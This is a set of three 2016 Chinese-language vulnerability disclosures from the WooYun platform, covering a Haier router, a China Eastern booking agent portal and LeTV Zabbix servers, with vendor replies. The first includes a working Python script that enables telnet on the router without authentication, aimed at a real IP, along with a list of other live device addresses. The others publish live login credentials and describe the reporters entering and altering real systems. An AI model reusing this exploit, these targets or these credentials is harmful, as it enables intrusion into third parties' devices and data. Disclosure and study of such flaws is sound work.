漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-04-28： 厂商已经主动忽略漏洞，细节向公众公开简要描述：WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备详细说明：该无线路由被大量使用，可通过该网站搜索：https://www.oshadan.com/main，关键字：Haier Wifi，可搜索到5000+经测试发现，该路由的/st_device.asp 文件有这样一个功能，如图：”启用 telnet远程管理“，打开这一选项，是不是就可以telnet了呢，试试选择该项，点击确定，然后执行：telnet xxx.xxx.xxx.xxx 23奇迹出现了，可直接登录设备，执行一系列的命令。便于测试，我简单写了一个python脚本，开通该功能：code 区域import sys import requests #url = sys.argv[1] url = 'http://124.152.236.162' if 'http' not in url: os._exit() url = "{}/apply.cgi".format(url) data = "igmp_enable=0&upnp_enable=1&syslogd_enable=1&telnetd_enable=1&reboot_enable=0&submit_button=st_device&change_action=&action=Apply&upnpEn=on&remote_management=0&rtelnetd=0&syslogd=0&reboot_start_hour=0&reboot_start_min=0" print '[*] Opening telnet ..' req = requests.post(url, data=data) if req.status_code == 200: print '[*] Success ..'直接运行该脚本，即可开通telnet远程控制的功能。随机选择一些案例来进行漏洞证明：0x1 http://124.152.236.162telnet 124.152.236.162 230x2 http://124.152.236.186telnet 124.152.236.186 230x3 http://49.117.1.98/telnet 49.117.1.98 23再给出一些案例：code 区域http://49.117.1.98/ http://124.152.236.186 http://124.152.236.162 http://72.130.248.15/ http://77.35.7.104/ 漏洞证明：该无线路由被大量使用，可通过该网站搜索：https://www.oshadan.com/main，关键字：Haier Wifi，可搜索到5000+经测试发现，该路由的/st_device.asp 文件有这样一个功能，如图：”启用 telnet远程管理“，打开这一选项，是不是就可以telnet了呢，试试选择该项，点击确定，然后执行：telnet xxx.xxx.xxx.xxx 23奇迹出现了，可直接登录设备，执行一系列的命令。便于测试，我简单写了一个python脚本，开通该功能：code 区域import sys import requests #url = sys.argv[1] url = 'http://124.152.236.162' if 'http' not in url: os._exit() url = "{}/apply.cgi".format(url) data = "igmp_enable=0&upnp_enable=1&syslogd_enable=1&telnetd_enable=1&reboot_enable=0&submit_button=st_device&change_action=&action=Apply&upnpEn=on&remote_management=0&rtelnetd=0&syslogd=0&reboot_start_hour=0&reboot_start_min=0" print '[*] Opening telnet ..' req = requests.post(url, data=data) if req.status_code == 200: print '[*] Success ..'直接运行该脚本，即可开通telnet远程控制的功能。随机选择一些案例来进行漏洞证明：0x1 http://124.152.236.162telnet 124.152.236.162 230x2 http://124.152.236.186telnet 124.152.236.186 230x3 http://49.117.1.98/telnet 49.117.1.98 23 修复方案：加强权限验证版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-04-28 17:33厂商回复： 最新状态：2016-04-28：感谢白帽子的测试与提醒，该漏洞属于已知问题，WooYun-2016-196887，WooYun-2015-155274，并且最新版本5.9.4.3已经修正该问题。欢迎继续关注海尔安全，谢谢。

漏洞详情披露状态： 2016-05-03： 细节已通知厂商并且等待厂商处理中2016-05-03： 厂商已经确认，细节仅向厂商公开2016-05-13： 细节向核心白帽子及相关领域专家公开2016-05-23： 细节向普通白帽子公开2016-06-02： 细节向实习白帽子公开2016-06-17： 细节向公众公开简要描述：无意的一次详细说明：厂商这么大的漏洞能否送个礼物呢？漏洞证明：地址：http://ceagent.ceair.com/ceagent/pages/back/login.jsp代理人账号：gaohua密码原来是GAOHUA123 现在被我改成GAOHUA123@泄露太多的机票信息，达到上万。如图。主要出现的问题在这。 WooYun: 航空信息安全之东方航空某系统漏洞（数千万机票订单信息/每天数万实时机票订单信息/控制民航短信号发诈骗短信续集） 证明结束修复方案：禁止账户，让他们重现注册！更改系统地址。版权声明：转载请注明来源 Alsn@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-03 09:52厂商回复：下次发帖时请附上破解过程，十分感谢!最新状态：暂无

漏洞详情披露状态： 2016-05-10： 细节已通知厂商并且等待厂商处理中2016-05-11： 厂商已经确认，细节仅向厂商公开2016-05-21： 细节向核心白帽子及相关领域专家公开2016-05-31： 细节向普通白帽子公开2016-06-10： 细节向实习白帽子公开2016-06-25： 细节向公众公开简要描述：乐视两个服务器的zabbix弱口令可shell可内网详细说明： 轮子发现了乐视多个服务器的zabbix系统，其中两个存在弱口令http://123.59.124.137/ zabbixhttp://123.59.124.138/ zabbixadmin zabbixzabbix后台是可以直接执行shell命令的。反弹一个shell 漏洞证明：和乐视的内网系统是相通的。可以以深入内网 修复方案：未深入，修复弱口令版权声明：转载请注明来源 李长歌@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：12确认时间：2016-05-11 11:07厂商回复：确认漏洞存在，感谢提交！最新状态：暂无